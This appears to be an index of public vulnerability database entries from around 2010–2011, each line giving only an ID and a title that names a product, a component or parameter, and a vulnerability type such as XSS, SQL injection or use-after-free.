[72171] Cisco Linksys BEFSR41 Admin Interface Multiple Fields XSS
[72166] Proofpoint Protection Server User Mail Filter Interface Authentication Bypass
[72135] ICONICS WebHMI VersionInfo ActiveX (GenVersion.dll) SetActiveXGUID() Method Ax_GUID Parameter Overflow
[72131] IceWarp Server webmail/index.html Multiple Parameter XSS
[72125] CA Arcot WebFort Versatile Authentication Server Unspecified Arbitrary Site Redirect
[72124] CA Arcot WebFort Versatile Authentication Server Unspecified XSS
[72111] 360 Web Manager adm/barra/assetmanager/assetmanager.php Unspecified Parameter Traversal Arbitrary File Manipulation
[72110] 360 Web Manager adm/barra/assetmanager/assetmanager.php Arbitrary File Upload
[72109] 360 Web Manager adm/barra/assetmanager/assetmanager.php HTML Source Installation Path Disclosure
[72093] ANGLE WebGLES Graphics Library Program::getActiveUniformMaxLength Off-by-three Overflow
[72091] Mozilla Firefox for Windows WebGLES Library Missing ASLR Protection Weakness
[72048] webERP AccountGroups.php CompanyNameField Parameter XSS
[71991] webSPELL admin/admincenter.php Multiple Parameter XSS
[71990] webSPELL index.php Multiple Parameter XSS
[71968] web2Project calendar.php token Parameter SQL Injection
[71961] Oracle Fusion Middleware Oracle WebLogic Server TLS Renegotiation Handshakes MiTM Plaintext Data Injection
[71944] Oracle Sun Java System Access Manager Policy Agent Web Proxy Agent Unspecified Remote DoS
[71934] Oracle E-Business Suite Web ADI Unspecified Remote Issue
[71917] Oracle JD Edwards EnterpriseOne Tools Web Runtime SEC /jde/JASMafletMafBrowserClose.mafService jdemafjasLinkTarget Parameter XSS
[71916] Oracle JD Edwards EnterpriseOne Tools Web Runtime SEC /jde/MafletClose.mafService RENDER_MAFLET Parameter XSS
[71915] Oracle JD Edwards EnterpriseOne Tools Web Runtime SEC /jde/E1Menu_OCL.mafService e1.namespace Parameter XSS
[71914] Oracle JD Edwards EnterpriseOne Tools Web Runtime SEC /jde/E1Menu_Menu.mafService e1.namespace Parameter XSS
[71913] Oracle JD Edwards EnterpriseOne Tools Web Runtime SEC /jde/E1Menu.maf jdeowpBackButtonProtect Parameter XSS
[71865] Ripe Website Manager ripe/modules/nav/admin.php menu_id Parameter XSS
[71844] WebJaxe php/partie_administrateur/administration.php Admin Password Manipulation CSRF
[71839] Webform Block Module for Drupal Webform Block Title Unspecified XSS
[71833] SAP NetWeaver Web Application Server ITS Mobile Start / ITS Mobile Test Services Unspecified XSS
[71832] SAP NetWeaver Web Application Server Unspecified Arbitrary Site Redirect
[71827] FiberHome HG-110 Router cgi-bin/webproc getpage Parameter Traversal Arbitrary File Access
[71826] FiberHome HG-110 Router cgi-bin/webproc getpage Parameter XSS
[71810] QianBo Enterprise Web Site Management System Search.Asp Keyword Parameter XSS
[71607] Oracle Java SE / Java for Business Deployment Java Webstart JNLP Extension Permission Handling Remote Code Execution
[71596] QTweb for Windows CSS Handling DoS
[71586] Easy File Sharing Web Server UserID Cookie Authentication Bypass
[71565] Privileged Identity Management (PIM) Suite Password Vault Web Access Unspecified XSS
[71547] WebKit Unspecified Memory Corruption (2011-0134)
[71542] WebKit Unspecified Memory Corruption (2011-0139)
[71541] WebKit CSSStyleSheet / CSSRuleList CSS Rule Deletion Use-after-free
[71539] WebKit RenderTextControlSingleLine::adjustControlHeightBasedOnLineHeight Bad Cast Memory Corruption
[71537] WebKit 'ReplaceSelectionCommand::doApply' Selection Modification Use-after-free
[71536] WebKit RenderBox::removeFloatingOrPositionedChildFromBlockLists Use-after-free Arbitrary Code Execution
[71535] WebKit Leaf Inline Box Selection State Bad Cast Memory Corruption
[71534] WebKit Large SVG Elements Handling Numeric Overflow Issue
[71533] WebKit CSS Stylesheets Lacking Wrappers Detached Subtrees Handling Use-after-free Issue
[71532] WebKit Render View Child Addition Memory Corruption
[71530] WebKit Node With Parent In Document Removal Memory Corruption
[71529] WebKit selectedStylesheetSet Property Handling Memory Corruption
[71528] WebKit DOMWindow::scrollTo Scroll Event Scrollbar Deletion Handling Use-after-free Issue
[71527] WebKit JavaScript 'sort()' Method Memory Corruption
[71525] WebKit RenderObjectChildList::updateBeforeAfterContent Content Updating Memory Corruption
[71524] WebKit Unspecified Memory Corruption (2011-0164)
[71517] WebKit SVG font-face-name Element Missing name Attribute Handling Memory Corruption
[71516] WebKit getTimingFunctionValue CSS Handling Use-after-free Issue
[71515] WebKit Nested first-letter Pseudo Element Non-layout Style Change Handling Memory Corruption
[71514] WebKit Range Content Processing DOM Tree Mutation Use-after-free
[71513] WebKit htmlelement Library setOuterText Method Handling Use-after-free Issue
[71512] WebKit Bad Typecasting Event Handling Memory Corruption
[71511] WebKit RenderLayerBacking::startAnimation Bad Typecasting Memory Corruption
[71510] WebKit CSSStyleSelector Code Various CSSValue Bad Casts Memory Corruption
[71509] WebKit Counter Node Handling Use-after-free Arbitrary Code Execution
[71508] WebKit Legend Element Float Addition Handling Use-after-free Arbitrary Code Execution
[71506] WebKit Text Drawing During Custom Font Loading Memory Corruption
[71504] WebKit Custom Font Handling Error Image Incorrect Size Memory Corruption
[71503] WebKit stringToLengthType Invalid Length Unit Parsing Out-of-bounds Read Issue
[71502] WebKit EventSource::endRequest EventSource Status Error Handling Use-after-free Issue
[71501] WebKit Accessibility Notification Sending Style Computation Use-after-free Issue
[71499] WebKit mousedown Event Type MouseEvent Bad Cast Memory Corruption
[71498] WebKit Unspecified Memory Corruption (2011-0130)
[71496] WebKit Run-in Box Promotion Use-after-free Issue
[71495] WebKit 'before' Child Adding Anonymous Table Part Use-after-free
[71490] WebCalendar edit_entry_handler.php Multiple Parameter XSS
[71468] IBM WEBi Unspecified XSS
[71467] IBM WEBi Unspecified Issue
[71456] IBM WebSphere Application Server (WAS) IVT Unspecified XSS
[71333] Webmedia Explorer /folder desc Parameter XSS
[71317] Zomplog /admin/settings.php weblog_subtitle Parameter XSS
[71313] PyroCMS index.php website Parameter XSS
[71311] wodWebServer.NET URL Traversal Arbitrary File Access
[71263] phpWebSite javascript/editors/fckeditor/editor/custom.php local Parameter XSS
[71252] IBM Tivoli Netcool/OMNIbus Web GUI Unspecified SQL Injection
[71182] WebKit Style Element Handling Integer Overflow Code Execution
[71178] TIBCO tibbr Web Server Unspecified XSS
[71164] SSWebPlus CMS info_view.php idx Parameter SQL Injection
[71118] F-Secure Policy Manager Web Reporting Module Invalid Report Access Path Disclosure
[71117] F-Secure Policy Manager Web Reporting Module Unspecified XSS
[71108] IBM Lotus Sametime stconf.nsf/WebMessage messageString Parameter XSS
[71040] Citrix XenApp / XenDesktop Unspecified XML Service Interface Remote Code Execution
[71037] DIY Web CMS login.php msg Parameter XSS
[71036] DIY Web CMS Catalog.asp Multiple Parameter SQL Injection
[71035] DIY Web CMS template.asp menuid Parameter SQL Injection
[71034] DIY Web CMS viewcatalog.asp id Parameter SQL Injection
[71033] Maian Weblog index.php post Parameter SQL Injection
[70990] WebKit Image Loading Failed Load Object Fallback Content Use-after-free Issue
[70977] WebKit AnimationControllerPrivate::fireEventsAndUpdateStyle Animation Event Processing Stale Pointer
[70975] WebAsyst index.php app Parameter XSS
[70974] WebAsyst SC/html/scripts/index.php Multiple Parameter XSS
[70972] PIPI Player PIPIWebPlayer ActiveX (PIWebPlayer.ocx) Multiple Method Overflow
[70947] PyWebDAV DAVServer/mysqlauth.py get_userinfo() Multiple Parameter SQL Injection
[70929] Seo Panel reports.php website_id Parameter SQL Injection
[70884] Cisco Security Agent Management Center webagent.exe st_upload Request Arbitrary File Upload
[70850] Windows Azure SDK Web Role Session Cookies State Information Disclosure
[70844] CGI:IRC interfaces/nonjs.pm R Parameter XSS
[70808] Kolibri WebServer HTTP Request Header Overflow
[70807] XEROX WorkCentre Web Server Unspecified Arbitrary Command Injection
[70743] TinyWebGallery admin/index.php Multiple Parameter XSS
[70736] Simple Web Content Management System /admin/item_delete.php id Parameter SQL Injection
[70732] Opera Unspecified Web Page Content Remote DoS
[70691] Linux udev USB Human Interface Device Functionality Warning Weakness Arbitrary Program Execution
[70690] Apple Mac OS X USB Human Interface Device Functionality Warning Weakness Arbitrary Program Execution
[70689] Microsoft Windows USB Human Interface Device Functionality Warning Weakness Arbitrary Program Execution
[70688] IBM WebSphere Portal Modified Message Unspecified Information Disclosure
[70685] Weborf get_param_value() Function Content-Length HTTP Header Remote Overflow DoS
[70669] ActiveWeb Professional EasyEdit.cfm getImagefile Arbitrary File Upload
[70616] Advanced Webhost Billing System (AWBS) cart.php oid Parameter SQL Injection
[70613] HotWeb Rentals default.asp PageId Parameter SQL Injection
[70592] Oracle Sun Convergence Webmail Unspecified Remote Issue
[70586] Oracle Sun Products Suite Sun Java System Communications Express Component Web Mail Unspecified Remote Issue
[70584] Oracle Fusion Middleware WebLogic Server Servlet Container Unspecified Remote Issue (2010-4453)
[70571] Oracle Fusion Middleware WebLogic Server Servlet Container AFSSESSIONID Cookie Session Fixation
[70570] Oracle Sun Management Center (SunMC) Web Console Unspecified Remote Information Disclosure
[70563] Oracle Supply Chain Products Suite Agile Core Web Client Unspecified Remote Issue
[70561] Oracle Fusion Middleware BI Publisher Web Server Unspecified Remote Issue (2010-4427)
[70559] Oracle Fusion Middleware BI Publisher Web Server Unspecified Remote Issue (2010-4425)
[70531] Oracle Fusion Middleware WebLogic Server Node Manager Unspecified Issue
[70516] Oracle Sun Java Communications / Sun Convergence Webmail Unspecified Remote Issue
[70476] IBM WebSphere MQ Crafted Message Header Field Remote Overflow
[70470] HP OpenView Network Node Manager (OV NNM) ovwebsnmpsrv.exe ovutil.dll stringToSeconds Function Remote Overflow
[70466] WebKit Video Handling HTMLVideoElement Bad Cast Memory Corruption
[70465] WebKit FrameView::scrollToAnchor Bad Cast Memory Corruption
[70461] WebKit SVG Use Element Removal Handling Use-after-free
[70456] WebKit CSS Token Sequence CANVAS Element Use-after-free Issue
[70454] WebKit Node-iteration Pointer Handling Use-after-free
[70438] Ariadne Web Content Management Preview Photo Page idPhoto Parameter SQL Injection
[70437] Ariadne Web Content Management Error Message Username Enumeration
[70428] Sybase EAServer Unspecified Arbitrary Web Service Remote Installation
[70415] Symantec Web Gateway login.php USERNAME Parameter SQL Injection
[70406] Webform Module for Drupal Unspecified SQL Injection
[70396] NTWebServer NTWebServer.exe HTTP Request Remote Overflow
[70391] Microsoft IE MSHTML.DLL ReleaseInterface Function Use-after-free Arbitrary Code Execution
[70389] RoomWizard Admin Interface /admin/sign/DeviceSynch Sync Connector AD Credentials Disclosure
[70387] IBM WebSphere Application Server (WAS) Administrative Console Direct Request Remote Information Disclosure
[70386] IBM WebSphere Application Server (WAS) Servlet Engine / Web Container Missing Error Page XSS
[70385] IBM WebSphere MQ Invalid Queue Message Overflow
[70359] Cisco Adaptive Security Appliances (ASA) TELNET Connection Interface Remote Access Restriction Bypass
[70357] Cisco Adaptive Security Appliances (ASA) emWEB Document Name Space Character Remote DoS
[70354] Cisco Adaptive Security Appliances (ASA) WebVPN CIFS Share Access Restriction Bypass
[70259] IBM Tivoli Access Manager WebSEAL Shift-reload Action Remote DoS
[70231] IBM Rational ClearQuest Web Client URL RECORD Action Number Restricted User Limitation Bypass
[70216] Academic Web Tools browse.php a_code Parameter XSS
[70214] iSpot/Clearspot webmain.cgi Multiple Admin Function CSRF
[70159] Django django.contrib.admin Admin Interface query String Information Disclosure
[70158] IBM Tivoli Access Manager for e-business WebSEAL URL Traversal Arbitrary File Access
[70135] OpenEMR interface/patient_file/summary/pnotes_full.php note Parameter XSS
[70134] OpenEMR interface/patient_file/summary/add_edit_issue.php issue Parameter SQL Injection
[70133] OpenEMR interface/main/calendar/index.php pc_facility Parameter SQL Injection
[70132] OpenEMR interface/patient_file/summary/demographics.php set_pid Parameter SQL Injection
[70131] OpenEMR interface/patient_file/summary/immunizations.php administered_by_id Parameter SQL Injection
[70130] OpenEMR interface/patient_file/summary/pnotes_full.php Multiple Parameter SQL Injection
[70129] OpenEMR interface/patient_file/summary/immunizations.php Multiple Parameter XSS
[70128] web@all Multiple Admin Function CSRF
[70125] CMS WebManager-Pro /admin/files.php Arbitrary File Upload
[70106] WebKit SVG Cursor Element Handling Use-after-free
[70105] WebKit CSSParser::parseFontFaceSrc CSS Font Face Parsing Type Confusion
[70086] Embedthis Appweb Ejscript Web Framework XSS
[70072] Oracle Communications Messaging Server Webmail Kerberos AP-REQ Remote DoS
[70065] Oracle Communications Messaging Server Webmail Unspecified Remote Issue (2010-3575)
[70027] Oracle iPlanet Web Server WebDAV Unspecified Remote Information Disclosure
[70026] Oracle iPlanet Web Server Administration Cross-site Request Forgery (2010-3544)
[70025] Oracle iPlanet Web Server Administration Unspecified Remote Issue (2010-3545)
[70024] Oracle iPlanet Web Server Web Container Remote HTTP Header Insertion
[70011] Opera WebSockets Unspecified Remote Issue
[70008] Opera Web Page Security Indication Display Weakness
[70004] Opera Web Page Content Dialog Box Focus Weakness
[69942] Microsoft WMI Administrative Tools WEBSingleView.ocx ActiveX Remote Code Execution
[69934] Mitel Audio and Web Conferencing (AWC) awcuser/cgi-bin/vcs xsl Parameter Arbitrary Command Injection
[69929] Gitweb index.php Multiple Parameter XSS
[69916] LiteSpeed Web Server HTTP Header LSAPI PHP Extension Processing Overflow
[69915] Seo Panel backlinks.php website_id Parameter SQL Injection
[69914] Seo Panel cron.php website_id Parameter SQL Injection
[69909] Seo Panel rank.php website_id Parameter SQL Injection
[69908] Seo Panel saturationchecker.php website_id Parameter SQL Injection
[69905] Seo Panel website.php Multiple Parameter SQL Injection
[69898] Seo Panel saturationchecker.php website_urls Parameter XSS
[69897] Seo Panel backlinks.php website_urls Parameter XSS
[69896] Seo Panel websites.php pageno Parameter XSS
[69824] Microsoft Windows Consent User Interface Local Privilege Escalation
[69784] Orion Network Performance Monitor InterfaceDetails.aspx NetObject Parameter XSS
[69761] WordPress XML-RPC Interface Access Restriction Bypass
[69758] Mozilla Firefox WebSockets Proxy Upgrade Negotiation Weakness
[69690] IceWarp Server webmail/basic/ Multiple Parameter XSS
[69689] IceWarp Server webmail/basic/minimizer/index.php script Parameter Traversal Arbitrary File Access
[69688] IceWarp Server webmail/basic/index.html _c Parameter Traversal Arbitrary File Access
[69672] WebKit 'EventHandler::updateSelectionForMouseDrag' Mouse Drag Event Use-after-free
[69671] WebKit SMILTimeContainer::updateAnimations SVG Animation Update Use-after-free
[69670] Google Chrome WebDevToolsFrontendImpl.cpp Privileged Extensions Restriction Weakness Use-after-free
[69668] Google Chrome WebM Video Out-of-bounds Read Remote DoS
[69654] IBM WebSphere Commerce Enterprise RunTimeProfileCacheCmdImpl Outbound Messaging System Message Disclosure
[69650] pfSense interfaces.php if Parameter XSS
[69636] WebEx Meeting Manager WebexUCFObject ActiveX Path Subversion Arbitrary DLL Injection Code Execution
[69600] HP Palm WebOS Contacts Application Crafted vCard XSS
[69586] VMware Server Web Access Traversal Arbitrary File Access
[69581] RV Dealer Website showAlllistings.asp orderBy Parameter SQL Injection
[69580] RV Dealer Website search.asp selStock Parameter SQL Injection
[69579] Web Wiz NewsPad database/NewsPad.mdb Direct Request Database Disclosure
[69561] IBM WebSphere MQ Internet Pass-Thru TLS Renegotiation Handshake MiTM Plaintext Data Injection
[69532] Kerio Control Web Filter Unspecified Issue
[69497] Apple iOS WebKit Mail DNS Prefetch LINK Element Image Loading Setting Bypass
[69484] TinyWebGallery i_frames/i_top_tags.php Multiple Parameter XSS
[69483] TinyWebGallery i_frames/i_titel.php Multiple Parameter XSS
[69482] TinyWebGallery i_frames/i_slideshowjquery.php Multiple Parameter XSS
[69481] TinyWebGallery i_frames/i_search.php Multiple Parameter XSS
[69480] TinyWebGallery i_frames/i_rate.php Multiple Parameter XSS
[69479] TinyWebGallery i_frames/i_privatelogin.php Multiple Parameter XSS
[69478] TinyWebGallery i_frames/i_optionen.php Multiple Parameter XSS
[69477] TinyWebGallery i_frames/i_login.php Multiple Parameter XSS
[69476] TinyWebGallery i_frames/i_info.php Multiple Parameter XSS
[69475] TinyWebGallery i_frames/i_kommentar.php twg_name Parameter XSS
[69474] TinyWebGallery i_frames/i_tags.php Multiple Parameter XSS
[69473] TinyWebGallery index.php Multiple Parameter XSS
[69472] TinyWebGallery admin/index.php Multiple Parameter XSS
[69471] webApp.secure Content-Length Header NULL Dereference DoS
[69454] Linux Kernel drivers/tty/tty_buffer.c flush_to_ldisc() Function TTY Interface Local DoS
[69446] Cisco Unified Videoconferencing (UVC) Multiple Products goform/websXMLAdminRequestCgi.cgi username Field Arbitrary Shell Command Injection
[69444] WebKit SVG Document Color Processing Bad Cast Arbitrary Code Execution
[69443] WebKit SVG Use Element Use-after-free Arbitrary Code Execution
[69442] WebKit Geolocation Objects Use-after-free Arbitrary Code Execution
[69440] WebKit CSS Token Sequence :first-letter Pseudo-element Handling Arbitrary Code Execution
[69439] WebKit Editable Element Processing Uninitialized Memory Access Arbitrary Code Execution
[69438] WebKit CSS Box Processing Unspecified Variable Casting Arbitrary Code Execution
[69437] WebKit Inline Text Box Use-after-free Arbitrary Code Execution
[69436] WebKit CSS 3D Transform Unspecified Variable Casting Arbitrary Code Execution
[69435] WebKit Hidden IFrame Custom Scrollbar Image Loading Use-after-free Arbitrary Code Execution
[69434] WebKit HTMLLinkElement::process DNS Prefetch Setting Bypass
[69433] WebKit 'Text::wholeText' Function Size Calculation Integer Overflow
[69432] WebKit Element Attribute Use-after-free Arbitrary Command Execution
[69430] WebKit Inline Styling Unspecified Variable Casting Arbitrary Code Execution
[69427] WebKit JavaScript Random Number Generation Algorithm Weakness
[69426] WebKit Crafted String Handling Unspecified Overflow
[69350] Ricoh Aficio Multiple Products Web Image Monitor Unspecified XSS
[69338] HP LoadRunner LoadRunner Web Tours login.pl Username Specifier Traversal Arbitrary File Upload
[69334] Camtron / TecVoz CMNC-200 IP Camera Web Server Request Saturation Remote DoS
[69332] Camtron / TecVoz CMNC-200 IP Camera Admin Interface URI Double Slash Remote Authentication Bypass
[69331] Camtron / TecVoz CMNC-200 IP Camera Admin Interface URI Traversal Arbitrary File Access
[69274] openEngine cms/website.php template Parameter XSS
[69273] openEngine cms/website.php template Parameter Traversal Arbitrary File Access
[69268] HP LaserJet Printers PJL Interface Unspecified Traversal Arbitrary File Access
[69252] IBM WebSphere MQ Unspecified Disk Consumption Remote DoS
[69245] IBM OmniFind Admin Interface SID IP Address Restriction Weakness Session Impersonation
[69244] IBM OmniFind Admin Interface Login Form SID Replay Session Fixation
[69232] Babylon Translation Interface Search XSS
[69229] IBM WebSphere MQ Security Parameters Field Cleartext Credentials Weakness
[69215] USAA Application for Android Visited Web Page Mirror Image Storage Information Disclosure
[69214] IBM WebSphere Application Server (WAS) Web Services Security Crafted JAX-WS Request Remote DoS
[69212] HP LoadRunner LoadRunner Web Tours Unspecified Remote DoS
[69211] HP Palm webOS Camera Application Unspecified Arbitrary File Overwrite
[69210] HP Palm webOS Service API Unspecified Service Call Local Privilege Escalation
[69209] HP Palm webOS Doc Viewer Crafted Word Document Arbitrary Code Execution
[69204] IBM WebSphere Application Server (WAS) Administrative Console Integrated Solution Console Unspecified XSS
[69203] IBM WebSphere Portal SemanticTagService.js Unspecified Parameter XSS
[69202] IBM WebSphere Commerce Sample Store Pages XSS
[69201] IBM WebSphere Commerce Organization Admin Console JavaServer Page SQL Injection
[69172] WebKit FEBlend::apply SVG Invalid Blend Mode Handling Array Indexing Code Execution
[69170] WebKit FrameLoader::loadWithDocumentLoader Destroyed Frame Use-after-free
[69169] libvpx WebM Video Invalid Frame Parsing Memory Corruption
[69165] WebKit SVG Document use Element Bad Cast Memory Corruption
[69164] WebKit RootInlineBox::alignBoxesInBlockDirection Text Area Handling Memory Corruption
[69163] WebKit Rich Text Editing Use-after-free Issue
[69144] Novell GroupWise WebAccess WebPublisher Unspecified XSS
[69103] WeBid confirm.php id Parameter XSS
[69102] WeBid includes/messages.inc.php lan Parameter Traversal Arbitrary File Access
[69094] Microsoft Forefront Unified Access Gateway (UAG) Mobile Portal Website Unspecified XSS
[69056] Oracle Java SE / Java for Business Web Start Component Unspecified Issue (2010-3550)
[69048] Oracle Java SE / Java for Business Web Start Component Unspecified Issue (2010-3558)
[69043] Oracle Java SE / Java for Business Web Start BasicServiceImpl Class Arbitrary Code Execution
[69007] IBM WebSphere Application Server (WAS) Administration Console Unspecified XSS (2010-0783)
[69000] MySQL HANDLER Interface Unspecified READ Request DoS
[68973] XWiki Watch xwiki/bin/viewrev/Main/WebHome rev Parameter XSS
[68954] Oracle WebLogic Node Manager Service Arbitrary File Access
[68930] IBM ENOVIA Web Services Unspecified Issue
[68922] Weborf HTTP Invalid Request Handling DoS
[68894] IBM Tivoli Access Manager for e-business ibm/wpm/webseal method Parameter XSS
[68870] Linux Kernel i915 DRM Subsystem GEM drivers/gpu/drm/i915/i915_gem.c IOCTL Interface Arbitrary Kernel Memory Write
[68866] Ettercap src/interfaces/gtk/ec_gtk_conf.c gtkui_conf_read() Function Local Overflow
[68843] WebKit Attr Node Modification Document.getElementById Malfunction Use-after-free
[68841] WebKit Large Animated GIF Handling Missing Return Value Check Memory Corruption
[68839] Google Chrome Web Sockets Shutdown Action Unspecified DoS
[68838] WebKit Asynchronous History Navigation Pop-up Blocker Bypass Weakness
[68831] Opera Unspecified Web Script Reload / Redirect Restriction Weakness
[68758] CMS WebManager-Pro index.php content_id Parameter SQL Injection
[68754] IBM WebSphere MQ X.509 Certificate Crafted Subject Distinguished Name (DN) Spoofing Weakness
[68732] NETGEAR CG3000/CG3100 Cable Gateway NETGEAR_SE User Interface Access Permissions Bypass
[68724] Intellicom NetBiter webSCADA WS100/WS200 cgi-bin/read.cgi Unspecified Arbitrary File Upload
[68723] Intellicom NetBiter webSCADA WS100/WS200 cgi-bin/read.cgi file Parameter Absolute Path Arbitrary File Access
[68722] Intellicom NetBiter webSCADA WS100/WS200 cgi-bin/read.cgi page Parameter Traversal Arbitrary File Access
[68710] Adobe RoboHelp for Word WebHelp Unspecified XSS
[68637] Attachmate Reflection for the Web Unspecified XSS
[68627] OpenConnect Debug Output webvpn Cookie Value Remote Information Disclosure
[68537] IBM WebSphere Application Server for z/OS Unspecified CSRF
[68536] IBM WebSphere Application Server for z/OS Unspecified XSS
[68534] Xweblog arsiv.asp tarih Parameter SQL Injection
[68533] Xweblog oku.asp makale_id Parameter SQL Injection
[68365] WebKit rendererIsNeeded SVG Document Handling Bad Cast Memory Corruption
[68362] Apple Safari on Windows Webkit.dll Malformed SGV Text Style Handling DoS
[68356] Webmatic index.php Multiple Parameter XSS
[68323] SurgeMail SurgeWeb /surgeweb username_ex Parameter XSS
[68311] Your Own Personal [WEB] Server (YOPS) http_parse_request_header Function Remote Overflow
[68282] webSPELL shoutbox_content.php Unspecified Parameter SQL Injection
[68281] webSPELL contact.php Unspecified Parameter Arbitrary Email Address Injection
[68280] webSPELL clanwars_details.php cwID Parameter SQL Injection
[68279] webSPELL asearch.php search Parameter SQL Injection
[68278] CMS WebManager-Pro c.php id Parameter SQL Injection
[68277] CMS WebManager-Pro c.php url Parameter Arbitrary Site Redirect
[68272] WebSiteAdmin ADMIN/login.php lng Parameter Traversal Local File Inclusion
[68184] SkyBlueCanvas Admin Interface User Password Manipulation CSRF
[68183] @mail Webmail Client index.php/mail/auth/processlogin MailType Parameter XSS
[68168] IBM WebSphere Application Server (WAS) Admin Console Crafted URL Unspecified Remote DoS
[68161] OmniTouch Contact Center TSA Server Tsa_Maintainance.exe Admin Interface Access Restriction Bypass
[68117] NitroView ESM Management Interface Unspecified Arbitrary File Access
[68103] WebKit Invalid Pending Resource Pattern SVG Handling Use-after-free Issue
[68102] WebKit SVG Style Use-after-free Arbitrary Code Execution
[68101] WebKit Document API Parsing Use-after-free Issue
[68084] Symphony CMS articles/a-primer-to-symphony-2s-default-theme/ fields[website] Parameter XSS
[68044] IBM Lotus Sametime Connect Webcontainer Implementation Unspecified Issue
[68008] IBM Proventia Network Mail Security System Local Management Interface load.php javaVersion Parameter CRLF Injection
[68007] IBM Proventia Network Mail Security System Local Management Interface sla/index.php l Parameter Traversal Arbitrary File Access
[68006] IBM Proventia Network Mail Security System Local Management Interface Multiple CSRF
[68005] IBM Proventia Network Mail Security System Local Management Interface Saved Search Filter XSS
[68004] IBM Proventia Network Mail Security System Local Management Interface Unspecified Stored Data XSS
[68003] IBM Proventia Network Mail Security System Local Management Interface sla/index.php l Parameter XSS
[68002] IBM Proventia Network Mail Security System Local Management Interface pvm_smtpstore.php action Parameter XSS
[68001] IBM Proventia Network Mail Security System Local Management Interface pvm_cert_serveraction.php action Parameter XSS
[68000] IBM Proventia Network Mail Security System Local Management Interface pvm_cert_commaction.php action Parameter XSS
[67999] IBM Proventia Network Mail Security System Local Management Interface sys_tools.php ping Parameter XSS
[67998] IBM Proventia Network Mail Security System Local Management Interface pvm_user_management.php userfilter Parameter XSS
[67997] IBM Proventia Network Mail Security System Local Management Interface pvm_messagestore.php date1 Parameter XSS
[67962] WebKit JavaScriptCore Floating Point Data Handling Non-Standard NaN Memory Corruption
[67933] WebKit FrameView::detachCustomScrollbars Scrollbar Handling Use-after-free
[67932] WebKit SelectElement::setSelectedIndex Form Menu Handling Bad Cast Memory Corruption
[67930] WebKit SelectionController::updateAppearance Selection Handling Use-after-free
[67926] WebKit RenderBlock::layoutBlock Inline Element Rendering Double-free
[67915] openSUSE Novell Client novfs /proc Interface Multiple Unspecified Overflow
[67873] Beehive Forum admin.php webtag Parameter XSS
[67872] Beehive Forum logon.php webtag Parameter XSS
[67871] Beehive Forum pm.php webtag Parameter XSS
[67870] Beehive Forum post.php webtag Parameter XSS
[67869] Beehive Forum index.php webtag Parameter XSS
[67867] WebKit Image Read Access Restriction Same Origin Policy Bypass Remote Information Disclosure
[67865] WebKit FocusController::setFocusedNode Element Focus Handling Use-after-free
[67863] WebKit findPlaceForCounter Counter Node Handling Memory Corruption
[67862] WebKit WebSockets Implementation Input Parsing Memory Corruption
[67859] Google Chrome WebSockets Implementation Socket Stream Closing During Host Resolution Handling DoS
[67845] SUSE Linux Enterprise yast2-webclient WebYaST Appliance Fixed Secret Key Session Cookie Spoofing Weakness
[67840] Weborf instance.c modURL Function Traversal Arbitrary File Access
[67831] MicroNetSoft Rental Property Management Website detail.asp ad_ID Parameter SQL Injection
[67830] RV Dealer Website detail.asp vehicletypeID Parameter SQL Injection
[67725] QtWeb Browser Path Subversion Arbitrary DLL Injection Code Execution
[67691] Wiccle Web Builder ajax.php post_text Parameter XSS
[67656] Sniper_SA Web Backdoor Unspecified Remote File Disclosure
[67631] Firebook Admin Interface param Parameter Path Disclosure
[67630] Firebook Admin Interface param Parameter Traversal Arbitrary File Access
[67628] Firebook Admin Interface URLproxy Parameter XSS
[67627] 2Wire Router HTTP Admin Interface Default Password
[67570] IBM WebSphere Application Server (WAS) JAX-WS WS-Security Policy Time Stamp Value Unspecified Issue
[67536] Webmatic Multiple Admin Function CSRF
[67486] phpMyAdmin libraries/database_interface.lib.php Unspecified Parameter XSS
[67467] WebKit Geolocation Activity Start Frame Disconnect Use-after-free Issue
[67466] WebKit Ruby Support Child Removal Use-after-free
[67462] WebKit MIME Type Handling PluginData Page Pointer Page Destruction Use-after-free
[67461] WebKit History::urlForState History State Methods Address Bar Spoofing
[67460] WebKit Bad Cast Invalid Text Node Text Editing Memory Corruption
[67459] WebKit SVG DeleteButtonController Enable State Change Use-after-free
[67415] GFI Web Monitor Proxy Port Unspecified XSS
[67411] Novell iPrint Client op-client-interface-version Operation call-back-url Parameter Remote Overflow
[67364] Splunk Server splunkweb Default Administrator Account
[67344] Cisco WebEx Player ARF File Handling Overflow
[67342] Simple Web Server (SWS) Malformed From Header Remote DoS
[67340] Baby ASP Web Server Connection Saturation Remote DoS
[67337] Quick 'n Easy Web Server Connection Saturation Remote DoS
[67296] WebKit loader/DocumentThreadableLoader.cpp XMLHttpRequest Cross-origin Request Credential Handling Weakness
[67295] WebKit page/Geolocation.cpp lastPosition Function Access Restriction Weakness
[67262] Palm Pre WebOS vCard Handling Arbitrary Code Execution
[67261] Palm Pre WebOS Multiple Unspecified Issues
[67260] i-Web Suite default.asp Multiple Parameter SQL Injection
[67259] i-Web Suite default.asp errmsg Parameter XSS
[67212] KnowledgeTree Web Service Document Upload Manager ktwebservice/KTUploadManager.inc.php Arbitrary File Upload
[67211] Ezyweb insert.image.php Arbitrary PHP File Upload
[67210] Ezyweb loginvalid.php Multiple Parameter SQL Injection
[67145] Asterisk Recording Interface recording_popup.php date Parameter XSS
[67144] Asterisk Recording Interface page.ampusers.php Administrative Action CSRF
[67143] Asterisk Recording Interface voicemail.module preg_match Function Path Disclosure
[67142] Asterisk Recording Interface voicemail.module selected7 Parameter Arbitrary File Access
[67141] NuralStorm Webmail settings.php Arbitrary File Write
[67140] NuralStorm Webmail problems.php Arbitrary Mail Relay
[67139] NuralStorm Webmail maintenance.php UPLOAD_DIR Parameter Arbitrary File Deletion
[67138] NuralStorm Webmail book_include.php BGCOLOR Parameter XSS
[67137] NuralStorm Webmail book.php Arbitrary User Addressbook Disclosure
[67136] NuralStorm Webmail Multiple Action CSRF
[67135] NuralStorm Webmail Crafted COOKIE_SESSSION Arbitrary File Upload
[67134] NuralStorm Webmail Addressbook Functionality Multiple XSS
[67119] Microsoft Outlook Web Access (OWA) Multiple Function CSRF
[67101] Gekko Web Builder /admin/index.php app Parameter XSS
[67078] EJBCA Admin Interface Unspecified XSS
[67027] SopCast WebPlayer sopocx.ocx ActiveX sop:// URL ChannelName Property Overflow
[67025] Cisco Unified Wireless Network (UWN) Solution WEBAUTH_REQD State WLAN Traffic Remote Access Restriction Bypass
[67022] Cisco Unified Wireless Network (UWN) Solution Virtual Interface Ping Remote DoS
[66932] HP OpenView Network Node Manager (OV NNM) webappmon.exe OvJavaLocale Cookie Value Handling Remote Overflow
